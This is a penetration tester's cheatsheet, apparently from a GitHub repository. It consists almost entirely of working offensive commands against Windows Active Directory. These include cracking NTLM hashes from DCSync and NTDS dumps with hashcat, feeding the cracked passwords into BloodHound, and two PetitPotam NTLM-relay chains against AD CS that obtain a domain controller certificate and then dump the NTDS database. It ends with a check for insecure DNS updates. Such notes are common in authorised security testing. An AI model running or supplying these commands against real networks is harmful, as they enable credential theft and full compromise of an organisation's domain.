-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcheatsheet.txt
49 lines (35 loc) · 1.56 KB
/
cheatsheet.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# Export in hashcat format (sort of)
nxcdb creds export hashcat "filename"
# Prepare NTLM for hashcat
sed 's/:[^:]*:/:/g' filename > newfilename
# hashcat for NTLM (DCSync)
sudo hashcat --username -a 0 -m 1000 hashes /usr/share/wordlists/rockyou.txt -r ~/tools/OneRuleToRuleThemStill/OneRuleToRuleThemStill.rule -O -w 4 --force
sudo hashcat --username -a 0 -m 1000 hashes --show
sudo hashcat --username -a 0 -m 1000 hashes --show | sed "s/^/DOMAIN.TLD\\\\/" > crackhound_input.txt
# Crack straight from nxc
hashcat -m 1000 -w 3 -O -d 1,2 -a 0 -p : --session=all --username -o cracked.out --outfile-format=3 ../file.ntds rockyou.txt -r OneRuleToRuleThemStill.rule --potfile-path hashcat.pot
# Add shit to Bloodhound
crackhound.py -f crackhound_input.txt -u neo4j -p toor -plaintext -addpw
# PetitPotam
## Variant 1
Get PetitPotam from "topotam" (github)
pip3 install certipy-ad
python3 PetitPotam.py -u <user> -p <pass> -d <DOMAIN> -dc-ip <DCIP> <KALIIP> <DCIP>
certipy-ad relay -target "http://CA.domain.tld" -template DomainController
certipy-ad auth -pfx "PFXFILE" -dc-ip <DCIP>
## Variant 2
python3 PetitPotam.py -u <user> -p <pass> -d <DOMAIN> -dc-ip <DCIP> <KALIIP> <DCIP>
sudo /usr/bin/impacket-ntlmrelayx -t http://<ca>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
cat cert64 | base64 -d > cert.pfx
certipy-ad auth -pfx "PFXFILE" -dc-ip <DCIP>
nxc smb -u <dc01$> -H <NTLMHASH> -d <DOMAIN> <DCIP> --ntds
# Insecure DNS
nsupdate
server <DNS-Server>
update add pt.<FQDN> 5 TXT "Hello World"
send
quit
nslookup
server <DNS-Server>
set type=txt
pt.<FQDN>